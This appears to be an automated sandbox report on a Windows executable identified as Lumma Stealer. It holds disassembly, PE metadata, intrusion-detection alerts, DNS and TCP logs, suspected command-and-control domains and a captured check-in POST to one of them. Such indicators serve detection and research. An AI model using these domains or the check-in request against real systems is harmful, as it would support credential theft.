mov dword ptr [edx+08h], eax
mov dword ptr [edx+0Ch], eax
lea edi, dword ptr [ecx+34h]
                                                                                                                                                          mov dword ptr [edx+18h], ecx
                                                                                                                                                          mov dword ptr [edi], edx
                                                                                                                                                          mov dword ptr [esp+04h], edi
                                                                                                                                                          call 00007F1C647FA974h
                                                                                                                                                          cld
                                                                                                                                                          call 00007F1C647F9A0Eh
                                                                                                                                                          call 00007F1C647F8649h
                                                                                                                                                          add esp, 08h
                                                                                                                                                          ret
                                                                                                                                                          jmp 00007F1C647FA820h
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          int3
                                                                                                                                                          mov ebx, dword ptr [esp+04h]
                                                                                                                                                          mov ebp, esp
                                                                                                                                                          mov dword ptr fs:[00000034h], 00000000h
                                                                                                                                                          mov ecx, dword ptr [ebx+04h]
                                                                                                                                                          cmp ecx, 00000000h
                                                                                                                                                          je 00007F1C647FA821h
                                                                                                                                                          mov eax, ecx
                                                                                                                                                          shl eax, 02h
                                                                                                                                                          sub esp, eax
                                                                                                                                                          mov edi, esp
                                                                                                                                                          mov esi, dword ptr [ebx+08h]
                                                                                                                                                          cld
                                                                                                                                                          rep movsd
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x517000 | 0x44c | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x537000 | 0x2f48c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x518000 | 0x1da84 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4a9be0 | 0xb4 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x24d308 | 0x24d400 | c4e1f723ae905cf4598ecb5dc4cff41b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x24f000 | 0x259968 | 0x259a00 | be6cf1db400ad1dd5e4c434643c98cfd | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4a9000 | 0x6d9a0 | 0x46000 | 39d7464b66d8b6ee1513a7fbe9afdfe7 | False | 0.3824986049107143 | data | 5.376735677069915 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x517000 | 0x44c | 0x600 | fe505a8139ebc7fcf214c5aea1da3a07 | False | 0.35546875 | OpenPGP Public Key | 3.804496625011791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x518000 | 0x1da84 | 0x1dc00 | de9e1b29314da97695a1ebb2353dd76f | False | 0.5736935399159664 | data | 6.619261120076471 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x536000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x537000 | 0x2f48c | 0x2f600 | 297a81611e0195edd5a09f4d673c1705 | False | 0.34936201352242746 | data | 4.644097258376503 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x5372b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3543 x 3543 px/m | | | 0.8031914893617021
RT_ICON | 0x537718 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3543 x 3543 px/m | | | 0.6565573770491804
RT_ICON | 0x5380a0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3543 x 3543 px/m | | | 0.5377579737335835
RT_ICON | 0x539148 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3543 x 3543 px/m | | | 0.3990663900414938
RT_ICON | 0x53b6f0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3543 x 3543 px/m | | | 0.3112305148795465
RT_ICON | 0x53f918 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3543 x 3543 px/m | | | 0.28271719038817006
RT_ICON | 0x544da0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3543 x 3543 px/m | | | 0.21936094177002313
RT_ICON | 0x54e248 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3543 x 3543 px/m | | | 0.16890453093576246
RT_ICON | 0x55ea70 | 0x6c6a | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9984506737767529
RT_GROUP_ICON | 0x5656dc | 0x84 | data | | | 0.7196969696969697
RT_VERSION | 0x565760 | 0x584 | data | English | United States | 0.28541076487252126
RT_MANIFEST | 0x565ce4 | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
DLL | Import
kernel32.dll | WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-13T21:34:53.689769+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49707 | 188.114.96.3 | 443 | TCP
2024-10-13T21:34:53.689769+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49707 | 188.114.96.3 | 443 | TCP
2024-10-13T21:34:53.712514+0200 | 2055479 | ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) | 1 | 192.168.2.7 | 62754 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.724743+0200 | 2055483 | ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) | 1 | 192.168.2.7 | 62260 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.740374+0200 | 2055475 | ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) | 1 | 192.168.2.7 | 63654 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.753153+0200 | 2055477 | ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop) | 1 | 192.168.2.7 | 55731 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.764790+0200 | 2055480 | ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop) | 1 | 192.168.2.7 | 49638 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.776070+0200 | 2055481 | ET MALWARE Lumma Stealer Domain in DNS Lookup (stagedchheiqwo .shop) | 1 | 192.168.2.7 | 54698 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.788496+0200 | 2055482 | ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop) | 1 | 192.168.2.7 | 64945 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:53.799618+0200 | 2055474 | ET MALWARE Lumma Stealer Domain in DNS Lookup (caffegclasiqwp .shop) | 1 | 192.168.2.7 | 52560 | 1.1.1.1 | 53 | UDP
2024-10-13T21:34:55.109408+0200 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.7 | 49708 | 104.102.49.254 | 443 | TCP
2024-10-13T21:34:56.217981+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49709 | 104.21.53.8 | 443 | TCP
2024-10-13T21:34:56.217981+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49709 | 104.21.53.8 | 443 | TCP
2024-10-13T21:34:57.441465+0200 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49712 | 104.21.53.8 | 443 | TCP
2024-10-13T21:34:57.441465+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49712 | 104.21.53.8 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2024 21:34:52.323033094 CEST | 49707 | 443 | 192.168.2.7 | 188.114.96.3
Oct 13, 2024 21:34:52.323069096 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.7
Oct 13, 2024 21:34:52.323129892 CEST | 49707 | 443 | 192.168.2.7 | 188.114.96.3
Oct 13, 2024 21:34:52.326288939 CEST | 49707 | 443 | 192.168.2.7 | 188.114.96.3
Oct 13, 2024 21:34:52.326304913 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.7
Oct 13, 2024 21:34:52.865120888 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.7
Oct 13, 2024 21:34:52.865225077 CEST | 49707 | 443 | 192.168.2.7 | 188.114.96.3
Oct 13, 2024 21:34:52.868465900 CEST | 49707 | 443 | 192.168.2.7 | 188.114.96.3
Oct 13, 2024 21:34:52.868478060 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.7
Oct 13, 2024 21:34:52.868793011 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.7
Oct 13, 2024 21:34:52.924778938 CEST | 49707 | 443 | 192.168.2.7 | 188.114.96.3
Oct 13, 2024 21:34:53.256957054 CEST | 49707 | 443 | 192.168.2.7 | 188.114.96.3
Oct 13, 2024 21:34:53.256994009 CEST | 49707 | 443 | 192.168.2.7 | 188.114.96.3
Oct 13, 2024 21:34:53.257291079 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.7
Oct 13, 2024 21:34:53.689843893 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.7
Oct 13, 2024 21:34:53.690107107 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.7
Oct 13, 2024 21:34:53.690335989 CEST | 49707 | 443 | 192.168.2.7 | 188.114.96.3
Oct 13, 2024 21:34:53.692754984 CEST | 49707 | 443 | 192.168.2.7 | 188.114.96.3
Oct 13, 2024 21:34:53.692776918 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.7
Oct 13, 2024 21:34:53.822875023 CEST | 49708 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 21:34:53.822926998 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:53.823000908 CEST | 49708 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 21:34:53.823292017 CEST | 49708 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 21:34:53.823309898 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:54.537899017 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:54.538007975 CEST | 49708 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 21:34:54.540851116 CEST | 49708 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 21:34:54.540862083 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:54.541172028 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:54.542428970 CEST | 49708 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 21:34:54.587394953 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:55.109513044 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:55.109580040 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:55.109623909 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:55.109771013 CEST | 49708 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 21:34:55.109797001 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:55.109882116 CEST | 49708 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 21:34:55.236602068 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:55.236660004 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:55.236768961 CEST | 49708 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 21:34:55.236808062 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:55.236820936 CEST | 49708 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 21:34:55.236855030 CEST | 49708 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 21:34:55.244261026 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:55.244362116 CEST | 49708 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 21:34:55.244370937 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:55.244421005 CEST | 49708 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 21:34:55.244427919 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 21:34:55.244529963 CEST | 443 | 49708 | 104.102.49.254 | 192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.244591951 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:55.245168924 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:55.245192051 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.245202065 CEST49708443192.168.2.7104.102.49.254
                                                                                                                                                          Oct 13, 2024 21:34:55.245207071 CEST44349708104.102.49.254192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.280880928 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:55.280926943 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.281006098 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:55.281291008 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:55.281308889 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.768702030 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:55.768778086 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.071321011 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.071352005 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.072309971 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.108249903 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.108272076 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.108439922 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.218041897 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.218178034 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.218229055 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.218244076 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.223952055 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.224004984 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.224014997 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.224231005 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.224283934 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.226794004 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.226814032 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.226826906 CEST49709443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.226834059 CEST44349709104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.512912035 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.512944937 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.513067961 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.513824940 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:56.513839960 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.998614073 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:56.998795986 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.000082016 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.000089884 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:57.000855923 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:57.002304077 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.002530098 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.002554893 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:57.441442013 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:57.441524029 CEST44349712104.21.53.8192.168.2.7
                                                                                                                                                          Oct 13, 2024 21:34:57.441797018 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.441797018 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.441837072 CEST49712443192.168.2.7104.21.53.8
                                                                                                                                                          Oct 13, 2024 21:34:57.441852093 CEST44349712104.21.53.8192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2024 21:34:52.297250986 CEST | 56453 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 21:34:52.317109108 CEST | 53 | 56453 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 21:34:53.712513924 CEST | 62754 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 21:34:53.721508980 CEST | 53 | 62754 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 21:34:53.724742889 CEST | 62260 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 21:34:53.734638929 CEST | 53 | 62260 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 21:34:53.740374088 CEST | 63654 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 21:34:53.750418901 CEST | 53 | 63654 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 21:34:53.753153086 CEST | 55731 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 21:34:53.762335062 CEST | 53 | 55731 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 21:34:53.764790058 CEST | 49638 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 21:34:53.773839951 CEST | 53 | 49638 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 21:34:53.776070118 CEST | 54698 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 21:34:53.785857916 CEST | 53 | 54698 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 21:34:53.788496017 CEST | 64945 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 21:34:53.797349930 CEST | 53 | 64945 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 21:34:53.799618006 CEST | 52560 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 21:34:53.809639931 CEST | 53 | 52560 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 21:34:53.811860085 CEST | 63276 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 21:34:53.818869114 CEST | 53 | 63276 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 21:34:55.270369053 CEST | 53891 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 21:34:55.280117035 CEST | 53 | 53891 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 13, 2024 21:34:52.297250986 CEST | 192.168.2.7 | 1.1.1.1 | 0x8a9c | Standard query (0) | nippydxmnwquo.shop | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.712513924 CEST | 192.168.2.7 | 1.1.1.1 | 0xc7c8 | Standard query (0) | locatedblsoqp.shop | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.724742889 CEST | 192.168.2.7 | 1.1.1.1 | 0x665e | Standard query (0) | traineiwnqo.shop | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.740374088 CEST | 192.168.2.7 | 1.1.1.1 | 0xb7fb | Standard query (0) | condedqpwqm.shop | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.753153086 CEST | 192.168.2.7 | 1.1.1.1 | 0x97c5 | Standard query (0) | evoliutwoqm.shop | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.764790058 CEST | 192.168.2.7 | 1.1.1.1 | 0xd9ee | Standard query (0) | millyscroqwp.shop | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.776070118 CEST | 192.168.2.7 | 1.1.1.1 | 0x23e6 | Standard query (0) | stagedchheiqwo.shop | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.788496017 CEST | 192.168.2.7 | 1.1.1.1 | 0x316b | Standard query (0) | stamppreewntnq.shop | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.799618006 CEST | 192.168.2.7 | 1.1.1.1 | 0xc83f | Standard query (0) | caffegclasiqwp.shop | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.811860085 CEST | 192.168.2.7 | 1.1.1.1 | 0x3a64 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:55.270369053 CEST | 192.168.2.7 | 1.1.1.1 | 0x4f0 | Standard query (0) | sergei-esenin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 13, 2024 21:34:52.317109108 CEST | 1.1.1.1 | 192.168.2.7 | 0x8a9c | No error (0) | nippydxmnwquo.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:52.317109108 CEST | 1.1.1.1 | 192.168.2.7 | 0x8a9c | No error (0) | nippydxmnwquo.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.721508980 CEST | 1.1.1.1 | 192.168.2.7 | 0xc7c8 | Name error (3) | locatedblsoqp.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.734638929 CEST | 1.1.1.1 | 192.168.2.7 | 0x665e | Name error (3) | traineiwnqo.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.750418901 CEST | 1.1.1.1 | 192.168.2.7 | 0xb7fb | Name error (3) | condedqpwqm.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.762335062 CEST | 1.1.1.1 | 192.168.2.7 | 0x97c5 | Name error (3) | evoliutwoqm.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.773839951 CEST | 1.1.1.1 | 192.168.2.7 | 0xd9ee | Name error (3) | millyscroqwp.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.785857916 CEST | 1.1.1.1 | 192.168.2.7 | 0x23e6 | Name error (3) | stagedchheiqwo.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.797349930 CEST | 1.1.1.1 | 192.168.2.7 | 0x316b | Name error (3) | stamppreewntnq.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.809639931 CEST | 1.1.1.1 | 192.168.2.7 | 0xc83f | Name error (3) | caffegclasiqwp.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:53.818869114 CEST | 1.1.1.1 | 192.168.2.7 | 0x3a64 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:55.280117035 CEST | 1.1.1.1 | 192.168.2.7 | 0x4f0 | No error (0) | sergei-esenin.com | | 104.21.53.8 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 21:34:55.280117035 CEST | 1.1.1.1 | 192.168.2.7 | 0x4f0 | No error (0) | sergei-esenin.com | | 172.67.206.204 | A (IP address) | IN (0x0001) | false
• nippydxmnwquo.shop
• steamcommunity.com
• sergei-esenin.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49707 | 188.114.96.3 | 443 | 1568 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-13 19:34:53 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: nippydxmnwquo.shop
2024-10-13 19:34:53 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-13 19:34:53 UTC | 833 | IN | HTTP/1.1 200 OK
Date: Sun, 13 Oct 2024 19:34:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=oeohh4cgtbhg6kikrar6jpi4mu; expires=Thu, 06 Feb 2025 13:21:32 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=umE4WPqGRZc2qYG5A7ProFIKAO%2F%2FkOi0knBR9KmIsjR39YZ7g1%2Fts8zzVxwmLMH5kCx5uL1KyMDSvcFNTl0x241KnSl1%2Barfil037OA%2B9yl8EZsq%2BKQ%2FvxUZ2Vg2mOrAeWvkQkI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d21c5073fca7287-EWR
alt-svc: h3=":443"; ma=86400
2024-10-13 19:34:53 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-13 19:34:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


